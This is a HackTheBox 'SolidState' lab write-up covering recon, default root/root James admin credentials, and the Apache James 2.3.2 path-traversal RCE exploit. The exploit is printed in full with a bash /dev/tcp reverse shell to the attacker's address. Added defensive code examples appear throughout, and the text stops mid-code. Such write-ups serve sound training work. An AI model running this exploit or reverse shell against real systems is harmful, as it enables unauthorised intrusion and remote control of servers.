
HacktheBox 'SolidState' writeup



 

Host Information

Hostname     IP Address    Operating System   Difficulty Level
SolidState   10.10.10.51   Linux              Medium

SolidState HTB Card



Initial Recon

Again, we start with our initial recon of the target system. We’ll use the same enumeration automation script we used on a few other recent boxes - nmapAutomator. You can find and download the script here on Github.

Let’s run a full scan against the target:


root@kali:/writeups/HTB/solidstate/enumeration# nmapAutomator.sh 10.10.10.51 all



Running a all scan on 10.10.10.51

                                                                                                                                      

                                                                                                                                      

---------------------Starting Nmap Quick Scan---------------------                                                                    

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:02 CST

Nmap scan report for 10.10.10.51

Host is up (0.044s latency).

Not shown: 959 closed ports, 40 filtered ports

Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT    STATE SERVICE

119/tcp open  nntp



Nmap done: 1 IP address (1 host up) scanned in 5.65 seconds







---------------------Starting Nmap Basic Scan---------------------

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:02 CST

Nmap scan report for 10.10.10.51

Host is up (0.046s latency).



PORT    STATE SERVICE VERSION

119/tcp open  nntp    JAMES nntpd (posting ok)

Service Info: Host: solidstate



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 1.11 seconds







----------------------Starting Nmap UDP Scan----------------------

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:02 CST

Warning: 10.10.10.51 giving up on port because retransmission cap hit (1).

Nmap scan report for 10.10.10.51

Host is up (0.039s latency).

All 1000 scanned ports on 10.10.10.51 are open|filtered (950) or closed (50)



Nmap done: 1 IP address (1 host up) scanned in 45.23 seconds







---------------------Starting Nmap Full Scan----------------------

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:03 CST

Initiating Parallel DNS resolution of 1 host. at 15:03

Completed Parallel DNS resolution of 1 host. at 15:03, 0.01s elapsed

Initiating SYN Stealth Scan at 15:03

Scanning 10.10.10.51 [65535 ports]

Discovered open port 80/tcp on 10.10.10.51

Discovered open port 110/tcp on 10.10.10.51

Discovered open port 25/tcp on 10.10.10.51

Discovered open port 22/tcp on 10.10.10.51

SYN Stealth Scan Timing: About 23.24% done; ETC: 15:05 (0:01:42 remaining)

SYN Stealth Scan Timing: About 46.49% done; ETC: 15:05 (0:01:10 remaining)

Discovered open port 4555/tcp on 10.10.10.51

SYN Stealth Scan Timing: About 69.37% done; ETC: 15:05 (0:00:40 remaining)

Discovered open port 119/tcp on 10.10.10.51

Completed SYN Stealth Scan at 15:05, 131.23s elapsed (65535 total ports)

Nmap scan report for 10.10.10.51

Host is up (0.042s latency).

Not shown: 65529 closed ports

PORT     STATE SERVICE

22/tcp   open  ssh

25/tcp   open  smtp

80/tcp   open  http

110/tcp  open  pop3

119/tcp  open  nntp

4555/tcp open  rsip



Read data files from: /usr/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 131.34 seconds

           Raw packets sent: 65595 (2.886MB) | Rcvd: 65535 (2.621MB)





Making a script scan on extra ports: 22, 25, 80, 110, 4555

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:05 CST

Nmap scan report for 10.10.10.51

Host is up (0.037s latency).



PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

| ssh-hostkey: 

|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)

|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)

|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)

25/tcp   open  smtp        JAMES smtpd 2.3.2

|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.50 [10.10.14.50]), 

80/tcp   open  http        Apache httpd 2.4.25 ((Debian))

|_http-server-header: Apache/2.4.25 (Debian)

|_http-title: Home - Solid State Security

110/tcp  open  pop3        JAMES pop3d 2.3.2

4555/tcp open  james-admin JAMES Remote Admin 2.3.2

Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 23.23 seconds







---------------------Starting Nmap Vulns Scan---------------------

                                                                                                                                      

Running CVE scan on all ports

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:06 CST

Nmap scan report for 10.10.10.51

Host is up (0.039s latency).



PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

25/tcp   open  smtp        JAMES smtpd 2.3.2

80/tcp   open  http        Apache httpd 2.4.25 ((Debian))

|_http-server-header: Apache/2.4.25 (Debian)

| vulners: 

|   cpe:/a:apache:http_server:2.4.25: 

|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679

|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668

|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169

|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167

|_      CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211

110/tcp  open  pop3        JAMES pop3d 2.3.2

119/tcp  open  nntp        JAMES nntpd (posting ok)

4555/tcp open  james-admin JAMES Remote Admin 2.3.2

Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 13.40 seconds





Running Vuln scan on all ports

                                                                                                                                      

Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 15:06 CST

Pre-scan script results:

| broadcast-avahi-dos: 

|   Discovered hosts:

|     224.0.0.251

|   After NULL UDP avahi packet DoS (CVE-2011-1002).

|_  Hosts are all up (not vulnerable).

Nmap scan report for 10.10.10.51

Host is up (0.038s latency).



PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

25/tcp   open  smtp        JAMES smtpd 2.3.2

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

| smtp-vuln-cve2010-4344: 

|_  The SMTP server is not Exim: NOT VULNERABLE

|_sslv2-drown: 

80/tcp   open  http        Apache httpd 2.4.25 ((Debian))

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

| http-csrf: 

| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.51

|   Found the following possible CSRF vulnerabilities: 

|     

|     Path: http://10.10.10.51:80/

|     Form id: name

|     Form action: #

|     

|     Path: http://10.10.10.51:80/about.html

|     Form id: name

|     Form action: #

|     

|     Path: http://10.10.10.51:80/services.html

|     Form id: name

|     Form action: #

|     

|     Path: http://10.10.10.51:80/index.html

|     Form id: name

|_    Form action: #

|_http-dombased-xss: Couldn't find any DOM based XSS.

| http-enum: 

|   /README.txt: Interesting, a readme.

|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.25 (debian)'

|_http-server-header: Apache/2.4.25 (Debian)

| http-sql-injection: 

|   Possible sqli for queries:

|     http://10.10.10.51:80/assets/js/?C=N%3bO%3dD%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=D%3bO%3dD%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=S%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/?C=N%3bO%3dD%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/?C=S%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/?C=D%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/?C=M%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=S%3bO%3dD%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=D%3bO%3dA%27%20OR%20sqlspider

|     http://10.10.10.51:80/assets/js/?C=N%3bO%3dA%27%20OR%20sqlspider

|_    http://10.10.10.51:80/assets/js/?C=M%3bO%3dA%27%20OR%20sqlspider

|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.

| vulners: 

|   cpe:/a:apache:http_server:2.4.25: 

|       CVE-2017-7679   7.5     https://vulners.com/cve/CVE-2017-7679

|       CVE-2017-7668   7.5     https://vulners.com/cve/CVE-2017-7668

|       CVE-2017-3169   7.5     https://vulners.com/cve/CVE-2017-3169

|       CVE-2017-3167   7.5     https://vulners.com/cve/CVE-2017-3167

|       CVE-2019-0211   7.2     https://vulners.com/cve/CVE-2019-0211

|       CVE-2018-1312   6.8     https://vulners.com/cve/CVE-2018-1312

|       CVE-2017-15715  6.8     https://vulners.com/cve/CVE-2017-15715

|       CVE-2019-10082  6.4     https://vulners.com/cve/CVE-2019-10082

|       CVE-2017-9788   6.4     https://vulners.com/cve/CVE-2017-9788

|       CVE-2019-0217   6.0     https://vulners.com/cve/CVE-2019-0217

|       CVE-2019-10098  5.8     https://vulners.com/cve/CVE-2019-10098

|       CVE-2019-10081  5.0     https://vulners.com/cve/CVE-2019-10081

|       CVE-2019-0220   5.0     https://vulners.com/cve/CVE-2019-0220

|       CVE-2019-0196   5.0     https://vulners.com/cve/CVE-2019-0196

|       CVE-2018-17199  5.0     https://vulners.com/cve/CVE-2018-17199

|       CVE-2018-1333   5.0     https://vulners.com/cve/CVE-2018-1333

|       CVE-2017-9798   5.0     https://vulners.com/cve/CVE-2017-9798

|       CVE-2017-7659   5.0     https://vulners.com/cve/CVE-2017-7659

|       CVE-2017-15710  5.0     https://vulners.com/cve/CVE-2017-15710

|       CVE-2019-0197   4.9     https://vulners.com/cve/CVE-2019-0197

|       CVE-2019-10092  4.3     https://vulners.com/cve/CVE-2019-10092

|       CVE-2018-11763  4.3     https://vulners.com/cve/CVE-2018-11763

|_      CVE-2018-1283   3.5     https://vulners.com/cve/CVE-2018-1283

110/tcp  open  pop3        JAMES pop3d 2.3.2

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

|_sslv2-drown: 

119/tcp  open  nntp        JAMES nntpd (posting ok)

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

|_sslv2-drown: 

4555/tcp open  james-admin JAMES Remote Admin 2.3.2

|_clamav-exec: ERROR: Script execution failed (use -d to debug)

Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel



Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 67.99 seconds







---------------------Recon Recommendations----------------------

                                                                                                                                      



Web Servers Recon:

                                                                                                                                      

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.php -u http://10.10.10.51:80 -o recon/gobuster_10.10.10.51_80.txt

nikto -host 10.10.10.51:80 | tee recon/nikto_10.10.10.51_80.txt











Which commands would you like to run?                                                                                                 

All (Default), gobuster, nikto, Skip <!>



Running Default in (1) s:  





---------------------Running Recon Commands----------------------

                                                                                                                                      



Starting gobuster scan

                                                                                                                                      

===============================================================

Gobuster v3.0.1

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)

===============================================================

[+] Url:            http://10.10.10.51:80

[+] Threads:        30

[+] Wordlist:       /usr/share/wordlists/dirb/common.txt

[+] Status codes:   200,204,301,302,307,401,403

[+] User Agent:     gobuster/3.0.1

[+] Show length:    true

[+] Extensions:     html,php

[+] Expanded:       true

[+] Timeout:        10s

===============================================================

2020/02/01 15:07:54 Starting gobuster

===============================================================

http://10.10.10.51:80/.htaccess (Status: 403) [Size: 295]

http://10.10.10.51:80/.htaccess.html (Status: 403) [Size: 300]

http://10.10.10.51:80/.htaccess.php (Status: 403) [Size: 299]

http://10.10.10.51:80/.htpasswd (Status: 403) [Size: 295]

http://10.10.10.51:80/.htpasswd.php (Status: 403) [Size: 299]

http://10.10.10.51:80/.htpasswd.html (Status: 403) [Size: 300]

http://10.10.10.51:80/.hta (Status: 403) [Size: 290]

http://10.10.10.51:80/.hta.html (Status: 403) [Size: 295]

http://10.10.10.51:80/.hta.php (Status: 403) [Size: 294]

http://10.10.10.51:80/about.html (Status: 200) [Size: 7161]

http://10.10.10.51:80/assets (Status: 301) [Size: 311]

http://10.10.10.51:80/images (Status: 301) [Size: 311]

http://10.10.10.51:80/index.html (Status: 200) [Size: 7774]

http://10.10.10.51:80/index.html (Status: 200) [Size: 7774]

http://10.10.10.51:80/server-status (Status: 403) [Size: 299]

http://10.10.10.51:80/services.html (Status: 200) [Size: 8398]

===============================================================

2020/02/01 15:08:32 Finished

===============================================================



Finished gobuster scan

                                                                                                                                      

=========================

                                                                                                                                      

Starting nikto scan

                                                                                                                                      

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP:          10.10.10.51

+ Target Hostname:    10.10.10.51

+ Target Port:        80

+ Start Time:         2020-02-01 15:08:32 (GMT-6)

---------------------------------------------------------------------------

+ Server: Apache/2.4.25 (Debian)

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ Apache/2.4.25 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.

+ Server may leak inodes via ETags, header found with file /, inode: 1e60, size: 5610a1e7a4c9b, mtime: gzip

+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 

+ OSVDB-3268: /images/: Directory indexing found.

+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.

+ OSVDB-3233: /icons/README: Apache default file found.

+ 7863 requests: 0 error(s) and 9 item(s) reported on remote host

+ End Time:           2020-02-01 15:14:08 (GMT-6) (336 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested



Finished nikto scan

                                                                                                                                      

=========================

                                                                                                                                      

                                                                                                                                      

                                                                                                                                      

---------------------Finished all Nmap scans---------------------                                                                     

                                                                                                                                      



Completed in 11 minute(s) and 36 second(s)

OK, interesting, it looks like we have a number of things to look at: HTTP and SSH are open on their standard ports, and we also have an SMTP service, NNTP (Network News Transfer Protocol), POP3, and a James Remote Admin port. Let’s check out HTTP first to see if there are any clues; if not, we can work our way through each of the other services to see if there are known exploits. We know that we’re running Apache 2.4.25 on Debian Linux.
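Before moving on to each service, it helps to turn the nmap port table into structured records rather than reading it by eye, so the same triage (which ports belong to which product, which banners carry versions) can be repeated on every box. The following is an added example for this writeup and is not part of nmap or nmapAutomator; the sample text is a constructed copy of the script-scan lines above, with the NNTP line from the full scan added so all six open ports appear.

```python
"""Parse the port table from nmap's normal output into records (added example)."""
import re

# Constructed sample: the "Making a script scan on extra ports" section above,
# plus the 119/tcp line from the full scan. NSE script lines start with '|'.
SAMPLE_NMAP_OUTPUT = """\
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp        JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.50 [10.10.14.50]), 
80/tcp   open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3        JAMES pop3d 2.3.2
119/tcp  open  nntp        JAMES nntpd (posting ok)
4555/tcp open  james-admin JAMES Remote Admin 2.3.2
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port line: "<port>/<proto>  <state>  <service>  [<version ...>]"
PORT_LINE = re.compile(
    r"^(?P<port>\d{1,5})/(?P<proto>tcp|udp)\s+"
    r"(?P<state>open|closed|filtered|open\|filtered|closed\|filtered|unfiltered)\s+"
    r"(?P<service>\S+)(?:\s+(?P<version>.*\S))?\s*$"
)


def parse_port_table(text):
    """Return one dict per port line; header, NSE ('|', '|_') and summary lines are skipped."""
    records = []
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            rec = m.groupdict()
            rec["port"] = int(rec["port"])
            rec["version"] = rec["version"] or ""   # no banner => empty string
            records.append(rec)
    return records


def services_by_product(records, product):
    """Sorted ports whose version banner mentions a product name (case-insensitive)."""
    needle = product.lower()
    return sorted(r["port"] for r in records if needle in r["version"].lower())


if __name__ == "__main__":
    recs = parse_port_table(SAMPLE_NMAP_OUTPUT)
    for r in recs:
        print("%5d/%s %-12s %s" % (r["port"], r["proto"], r["service"], r["version"]))
    print("ports running JAMES:", services_by_product(recs, "james"))
```

Grouping by product is what makes the next step obvious: four of the six open ports report the same JAMES 2.3.2 banner, so one finding against that version affects all of them.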

 

checking out HTTP

Upon visiting the website on port 80, we’re greeted with a pretty slick, dynamic-looking web page:

SolidState main page

There doesn’t seem to be anything obvious on the website that might serve as a hint; there are a few fields that could potentially provide avenues for XSS or SQLi, but let’s keep enumerating for now. Nothing of interest showed up in the images or assets directories, and README.txt just confirms that the site is HTML5 and gives some copyright notices. Let’s move on.

 

checking out James Remote Admin

Let’s take a look at the James Remote Admin port next, as I’m not familiar with what it does. I’m guessing it has something to do with remote mail/tool suite administration, as the SMTP, POP3 and NNTP services were all labeled as James. A quick search indicates that James is an Apache mail server suite.

A quick searchsploit search for the James version shown by nmap reveals only one result:


root@kali:/writeups/HTB/solidstate/enumeration# searchsploit james 2.3.2

-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

 Exploit Title                                                                                                                                    |  Path

                                                                                                                                                  | (/usr/share/exploitdb/)

-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Apache James Server 2.3.2 - Remote Command Execution                                                                                              | exploits/linux/remote/35513.py

-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

Shellcodes: No Result

A quick look at the code with searchsploit -x reveals it to be an authenticated remote command execution exploit. That’s a bummer, as we don’t have credentials. There is a default of root / root provided in the exploit, though, so we can go ahead and try that on the off-chance that the service suite has default (or easy to guess) credentials enabled. If not, we’ll either have to find a way to get likely credentials (from the Apache HTTP server, or another service) or try another exploit.

 

running an initial exploit

Let’s go ahead and download the exploit locally.


  Exploit: Apache James Server 2.3.2 - Remote Command Execution

      URL: https://www.exploit-db.com/exploits/35513

     Path: /usr/share/exploitdb/exploits/linux/remote/35513.py

File Type: Python script, ASCII text executable, with CRLF line terminators



Copied to: /writeups/HTB/solidstate/exploits/35513.py





root@kali:/writeups/HTB/solidstate/exploits# mv 35513.py james_rce.py

There are two options within the exploit: one to run the payload only as root, the other to deliver the payload as any user. Since we don’t know which user we’ll log in as, let’s set the payload to deliver as any user. The default Apache James remote management credentials root/root are already provided, and those are the only credentials we’re aware of, so let’s leave them. By default the payload places a proof.txt file in either /root/proof.txt for root, or /tmp/proof.txt for any user. So let’s modify that file creation to throw a reverse shell instead.

Here’s the code for our modified exploit:


#!/usr/bin/python

#

# Exploit Title: Apache James Server 2.3.2 Authenticated User Remote Command Execution

# Date: 16\10\2014

# Exploit Author: Jakub Palaczynski, Marcin Woloszyn, Maciej Grabiec

# Vendor Homepage: http://james.apache.org/server/

# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip

# Version: Apache James Server 2.3.2

# Tested on: Ubuntu, Debian

# Info: This exploit works on default installation of Apache James Server 2.3.2

# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d



import socket

import sys

import time



# specify payload

payload = 'bash -i >& /dev/tcp/10.10.14.50/43110 0>&1' # to exploit on any user 

#payload = '[ "$(id -u)" == "0" ] && bash -i >& /dev/tcp/10.10.14.50/43110 0>&1' # to exploit only on root

# credentials to James Remote Administration Tool (Default - root/root)

user = 'root'

pwd = 'root'



if len(sys.argv) != 2:

    sys.stderr.write("[-]Usage: python %s <ip>\n" % sys.argv[0])

    sys.stderr.write("[-]Exemple: python %s 127.0.0.1\n" % sys.argv[0])

    sys.exit(1)



ip = sys.argv[1]



def recv(s):

        s.recv(1024)

        time.sleep(0.2)



try:

    print "[+]Connecting to James Remote Administration Tool..."

    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    s.connect((ip,4555))

    s.recv(1024)

    s.send(user + "\n")

    s.recv(1024)

    s.send(pwd + "\n")

    s.recv(1024)

    print "[+]Creating user..."

    s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n")

    s.recv(1024)

    s.send("quit\n")

    s.close()



    print "[+]Connecting to James SMTP server..."

    s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)

    s.connect((ip,25))

    s.send("ehlo team@team.pl\r\n")

    recv(s)

    print "[+]Sending payload..."

    s.send("mail from: <'@team.pl>\r\n")

    recv(s)

    # also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n") if the recipient cannot be found

    s.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n")

    recv(s)

    s.send("data\r\n")

    recv(s)

    s.send("From: team@team.pl\r\n")

    s.send("\r\n")

    s.send("'\n")

    s.send(payload + "\n")

    s.send("\r\n.\r\n")

    recv(s)

    s.send("quit\r\n")

    recv(s)

    s.close()

    print "[+]Done! Payload will be executed once somebody logs in."

except:

    print "Connection failed."

OK, let’s go ahead and start a listener locally with nc -lvnp 43110 to catch our shell, on the off-chance the default creds actually work.

Now let’s give it a run:


root@kali:/writeups/HTB/solidstate/exploits# python james_rce.py 10.10.10.51

[+]Connecting to James Remote Administration Tool...

[+]Creating user...

[+]Connecting to James SMTP server...

[+]Sending payload...

[+]Done! Payload will be executed once somebody logs in.

OK, so that might actually have worked; at the very least it didn’t error out, which probably means the default credentials worked. However, the exploit tells us the payload won’t be executed until somebody logs in. Let’s see if we can log in to the administration port, or another James service (such as SMTP or POP3), with root / root ourselves, to see if we can find a way further into the system and have the payload run.

Going to the remote administration port in a browser doesn’t load anything.

 

a slight misstep

Let’s try another service to see if we can authenticate. I seem to remember that SMTP by default can be accessed via telnet, so let’s try that first. I don’t remember the exact syntax, I think you have to somehow send a SYN type message to the server first, then authenticate. A quick search turns up a pretty good guide on how to authenticate over telnet. Let’s go ahead and connect to and greet the server:


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 25

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Sun, 2 Feb 2020 14:51:58 -0500 (EST)

EHLO 10.10.10.51

250-solidstate Hello 10.10.10.51 (10.10.14.50 [10.10.14.50])

250-PIPELINING

250 ENHANCEDSTATUSCODES



OK, now it looks like we need to base64 encode our credentials before passing them with AUTH LOGIN. Since our username and password are the same, we just need to run the following in a new local shell:


root@kali:~# echo "root" | base64

cm9vdAo=

Now let’s give passing the creds to SMTP a shot:


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 25

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

220 solidstate SMTP Server (JAMES SMTP Server 2.3.2) ready Sun, 2 Feb 2020 14:58:02 -0500 (EST)

EHLO 10.10.10.51

250-solidstate Hello 10.10.10.51 (10.10.14.50 [10.10.14.50])

250-PIPELINING

250 ENHANCEDSTATUSCODES

AUTH LOGIN

334 VXNlcm5hbWU6

cm9vdAo=

334 UGFzc3dvcmQ6

cm9vdAo=

535 Authentication Failed

Bummer, that didn’t seem to work.
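AUTH LOGIN is nothing more than two base64 round-trips, which is also why it is worth decoding whenever it turns up in a packet capture or a mail server log: the exchange above is fully recoverable from what went over the wire. The following is an added example for this writeup (not code from the original post or from the James project); the transcript it decodes is a constructed copy of the telnet session above. It also handles the failure mode in that session: `echo root | base64` encodes the trailing newline that echo appends, so the server sees the value `root\n`, whereas `echo -n root | base64` (or the encoder below) gives `cm9vdA==`.

```python
"""Decode a captured SMTP AUTH LOGIN exchange (added example for this writeup)."""
import base64

# Constructed transcript, copied from the telnet session above. Server lines
# start with a 3-digit reply code; client lines do not.
CAPTURED_SESSION = """\
AUTH LOGIN
334 VXNlcm5hbWU6
cm9vdAo=
334 UGFzc3dvcmQ6
cm9vdAo=
535 Authentication Failed
"""


def auth_login_encode(value):
    """Encode one AUTH LOGIN response: the bytes are base64'd exactly as given."""
    return base64.b64encode(value.encode()).decode("ascii")


def decode_auth_login(transcript):
    """Return (server_prompts, client_responses) as decoded byte strings.

    Only the lines between 'AUTH LOGIN' and the final reply are base64. A 334
    reply carries a base64 prompt ('Username:' / 'Password:'); any other code
    (235 success, 535 failure) ends the exchange.
    """
    prompts, responses = [], []
    in_auth = False
    for raw in transcript.splitlines():
        line = raw.strip()
        if line.upper() == "AUTH LOGIN":
            in_auth = True
            continue
        if not in_auth or not line:
            continue
        if line[:3].isdigit():
            code, _, rest = line.partition(" ")
            if code != "334":
                break
            prompts.append(base64.b64decode(rest))
        else:
            responses.append(base64.b64decode(line))
    return prompts, responses


def responses_have_trailing_newline(transcript):
    """True if any client response decodes to a value ending in '\\n', the
    tell-tale of `echo value | base64` run without -n."""
    _, responses = decode_auth_login(transcript)
    return any(r.endswith(b"\n") for r in responses)


if __name__ == "__main__":
    prompts, responses = decode_auth_login(CAPTURED_SESSION)
    for p, r in zip(prompts, responses):
        print("%-10s -> %r" % (p.decode(), r))
    print("trailing newline in responses:", responses_have_trailing_newline(CAPTURED_SESSION))
```

Run against the session above it prints `Username:  -> b'root\n'` and `Password:  -> b'root\n'`, which is the value the server compared against and rejected; `auth_login_encode("root")` is the `cm9vdA==` you would send instead.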

 

finding further information through compromised accounts

Let’s try something else. Let’s see if we can log directly in to the remote administration port with telnet:


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

JAMES Remote Administration Tool 2.3.2

Please enter your login and password

Login id:

root

Password:

root

Welcome root. HELP for a list of commands

OK, that was a lot more straightforward, I probably should have tried that first.

It looks like the listener has not caught a shell. Taking another look at the exploit, it used SMTP to send the payload, so we’ll probably need to log in as a user to the POP3 service in order for the payload to fire. Let’s see if we can do anything further with the James Remote Administration login. There is a good list of valid James Remote Admin commands on this site, so let’s see if we can list the users, change a password for one, then log in as them to POP3, to see if that causes the listener to get a shell.


root@kali:/writeups/HTB/solidstate/exploits# telnet 10.10.10.51 4555

Trying 10.10.10.51...

Connected to 10.10.10.51.

Escape character is '^]'.

JAMES Remote Administration Tool 2.3.2

Please enter your login and password

Login id:

root

Password:

root

Welcome root. HELP for a list of commands

listusers

Existing accounts 6

user: james

user: ../../../../../../../../etc/bash_completion.d

user: thomas

user: john

user: mindy

user: mailadmin

OK, we got a list of users, and the account showing as bash_completion.d is an artifact of the RCE exploit we ran earlier. Let’s try to change Thomas’s credentials and log in as him to POP3.
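That stray account is the whole vulnerability in one line: James 2.3.2 takes the username from `adduser` and uses it to build a directory path for the mailbox, so a name made of `../` segments lands the mailbox (and later the mail body) outside the mail spool. The following added example, written for this writeup and not taken from James, shows the unsafe path construction beside the confined form a mail server should use, plus a check that flags such accounts in `listusers` output. The mail root and the allowed-character rule are assumptions for illustration; the sample listing is a constructed copy of the session above.

```python
"""Confine a username-derived mailbox path to the mail root (added example)."""
import os
import re

MAIL_ROOT = "/srv/james/inboxes"     # assumed layout, for illustration only
# Assumed allow-list: letters, digits, '.', '_', '-'; must not start with '.'
USERNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


def mailbox_path_unchecked(root, username):
    """The vulnerable pattern: the name is joined straight into a path, so
    '..' segments walk out of the mail root."""
    return os.path.normpath(os.path.join(root, username))


def mailbox_path_confined(root, username):
    """Hardened form: allow-list the characters, then verify the resolved path
    still lies inside root (the second check catches anything the regex
    missed, e.g. a symlinked component)."""
    if ".." in username or not USERNAME_RE.match(username):
        raise ValueError("invalid username: %r" % username)
    real_root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(real_root, username))
    if os.path.commonpath([real_root, candidate]) != real_root:
        raise ValueError("username escapes mail root: %r" % username)
    return candidate


def username_is_safe(root, username):
    """Boolean wrapper around mailbox_path_confined for callers that only need a verdict."""
    try:
        mailbox_path_confined(root, username)
        return True
    except ValueError:
        return False


def suspicious_accounts(listusers_output):
    """Names from a 'listusers' listing that fail the allow-list: a cheap way
    for an administrator to spot accounts created with traversal sequences."""
    names = [line.split("user: ", 1)[1].strip()
             for line in listusers_output.splitlines() if line.startswith("user: ")]
    return [n for n in names if not USERNAME_RE.match(n)]


# Constructed sample, copied from the listusers session in this writeup.
SAMPLE_LISTUSERS = """\
Existing accounts 6
user: james
user: ../../../../../../../../etc/bash_completion.d
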